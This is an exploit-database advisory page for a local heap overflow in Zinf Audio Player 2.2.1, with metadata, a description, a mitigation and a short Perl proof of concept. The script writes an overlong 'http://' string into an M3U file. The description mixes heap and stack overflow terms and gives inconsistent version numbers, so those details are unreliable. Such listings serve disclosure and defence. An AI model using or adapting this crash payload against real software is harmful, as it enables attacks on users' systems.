header-logo
Suggest Exploit
vendor:
Zinf Audio Player
by:
Hakxer
9.3
CVSS
HIGH
Heap Overflow
119
CWE
Product Name: Zinf Audio Player
Affected Version From: 2.2.2001
Affected Version To: 2.2.2001
Patch Exists: Yes
Related CWE: N/A
CPE: a:zinf:zinf_audio_player
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows
2009

Zinf Audio Player 2.2.1 (M3U FILE) Local Heap Overflow

A heap overflow vulnerability exists in Zinf Audio Player 2.2.1 when processing a specially crafted M3U file. An attacker can exploit this vulnerability to execute arbitrary code in the context of the application. The vulnerability is caused due to a boundary error within the processing of the M3U file. This can be exploited to cause a stack-based buffer overflow by passing an overly long string to the affected application.

Mitigation:

Upgrade to the latest version of Zinf Audio Player.
Source

Exploit-DB raw data:

#!/usr/bin/perl
# Discovered & Written by : Hakxer
# Home : www.sec-geeks.com
# Program : http://www.zinf.org/ ../http://prdownloads.sourceforge.net/zinf/zinf-setup-2.2.1.exe
# Zinf Audio Player 2.2.1 (M3U FILE)  Local Heap Overflow

my $chars="http://"."A" x 50000;

open(MYFILE,'>>hakxer.m3u');

print MYFILE $chars;

close(MYFILE);

print " Done";

# milw0rm.com [2009-01-27]

Navigation

Suggest Exploit

Services By CQR